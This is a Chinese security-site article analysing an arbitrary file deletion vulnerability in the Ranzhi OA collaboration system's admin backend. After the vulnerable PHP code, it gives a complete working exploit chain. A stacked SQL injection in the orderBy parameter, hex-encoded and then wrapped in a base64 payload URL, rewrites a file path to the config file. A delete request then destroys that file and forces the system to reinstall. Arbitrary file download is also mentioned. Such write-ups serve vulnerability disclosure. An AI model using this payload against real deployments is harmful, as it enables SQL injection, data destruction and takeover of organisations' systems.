ce安全网绿色资源分享

教程资讯|常用软件|安卓下载|下载排行|最近更新

软件
软件
文章
当前位置:首页网络安全安全文章 → 然之OA协同系统后台任意文件删除漏洞

然之OA协同系统后台任意文件删除漏洞

时间:2018-03-12 13:43:20人气:作者:本站作者我要评论

然之OA系统简介

然之是一款面向中小企业的协同办公系统,它包括了客户管理系统 crm系统、OA系统、企业记账软件、文档管理系统、工作流系统、免费考勤系统、免费审批系统、免费报销系统。

然之OA协同系统后台任意文件删除漏洞

漏洞分析

任意文件删除的触发点有很多,这里以一个简单的利用点为例:

public function getByID($fileID)
{
    $file = $this->dao->findById($fileID)->from(TABLE_FILE)->fetch();

    $realPathName   = $this->getRealPathName($file->pathname);
    $file->realPath = $this->savePath . $realPathName;
    $file->webPath  = $this->webPath . $realPathName;

    return $this->processFile($file);
}

public function delete($fileID, $null = null)
{
    $file = $this->getByID($fileID);
    if(file_exists($file->realPath)) unlink($file->realPath);
    $this->dao->delete()->from(TABLE_FILE)->where('id')->eq($file->id)->exec();
    return !dao::isError();
}

逻辑很简单,根据fileID获取文件信息,然后判断存在该文件则删除。其中获取文件信息是从TABLE_FILE数据表中查询,即对应为sys_file表,因为我们可以通过SQL语句修改控制sys_file表,因此就可以控制任意文件删除。

漏洞利用

首先后台上传一个图片文件。

注意文件名设置为易于识别的字符。然后通过访问file-edit-ID查找该文件的ID。

ID为1,利用SQL注入漏洞修改sys_file表中ID为1的pathname为我们想要删除的文件。
SQL语句:

update sys_file set pathname='../../../config/my.php' where id=1

构造param:

{"orderBy":"id limit 0,1;set @query=0x757064617465207379735f66696c652073657420706174686e616d653d272e2e2f2e2e2f2e2e2f636f6e6669672f6d792e706870272077686572652069643d31;prepare stmt from @query;execute stmt;" }

最终Payload:

http://www.cesafe.com/ranzhi/www/cash/block-printTradeBlock.html?param=eyJvcmRlckJ5IjoiaWQgbGltaXQgMCwxO3NldCBAcXVlcnk9MHg3NTcwNjQ2MTc0NjUyMDczNzk3MzVmNjY2OTZjNjUyMDczNjU3NDIwNzA2MTc0Njg2ZTYxNmQ2NTNkMjcyZTJlMmYyZTJlMmYyZTJlMmY2MzZmNmU2NjY5NjcyZjZkNzkyZTcwNjg3MDI3MjA3NzY4NjU3MjY1MjA2OTY0M2QzMTtwcmVwYXJlIHN0bXQgZnJvbSBAcXVlcnk7ZXhlY3V0ZSBzdG10OyIgfQ==

然后访问http://www.cesafe.com/ranzhi/www/sys/file-delete-1
即可完成任意文件删除。同样也可存在任意文件下载漏洞file-download-ID
此时删除了my.php文件之后,该系统将会重新安装。

相关文章

猜你喜欢

网友评论

验证码:

请自觉遵守互联网相关政策法规,评论内容只代表网友观点,与本站立场无关!

最新评论

已有人参与,点击查看更多精彩评论

本类推荐

关于CE安全网 | 联系方式 | 发展历程 | 版权声明 | 下载帮助(?) | 广告联系 | 网站地图 | 友情链接

Copyright 2019-2029 cesafe.com 【CE安全网】 版权所有 琼ICP备2021004244号-1| 琼ICP备2021004244号-1

声明: 本站为非赢利性网站 不接受任何赞助和广告 所有软件和文章来自互联网 如有异议 请与本站联系 技术支持:ce安全网